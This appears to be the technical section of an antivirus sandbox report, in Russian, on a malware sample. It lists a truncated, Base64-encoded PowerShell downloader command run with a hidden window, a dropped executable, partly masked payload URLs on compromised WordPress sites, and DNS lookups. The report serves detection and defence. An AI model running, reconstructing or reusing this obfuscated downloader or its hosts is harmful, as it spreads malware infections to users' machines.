Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABSAFQASABRAFMAbABjAGkAPQAnAFAAQgBNAEMAUwBlAHYAcwAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGUAQwBVAGAAUgBpAHQAYABZAHAAcgBvAGAAVABgAE8AQwBgAG8ATAAiAC...
- %HOMEPATH%\816.exe
- %HOMEPATH%\816.exe
- http://in##########municationandconstruction.com/wp-admin/i_64e6_prqa/
- http://bo######mjrphotography.com/wp-admin/yi_h5_5h7498m3/
- http://bo###ahamjr.com/wp-admin/hp_zi36_ve0y/
- DNS ASK in##########municationandconstruction.com
- DNS ASK ti####consult.com
- DNS ASK bo######mjrphotography.com
- DNS ASK as###dtoday.com
- DNS ASK bo###ahamjr.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABSAFQASABRAFMAbABjAGkAPQAnAFAAQgBNAEMAUwBlAHYAcwAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGUAQwBVAGAAUgBpAHQAYABZAHAAcgBvAGAAVABgAE8AQwBgAG8ATAAiAC...' (со скрытым окном)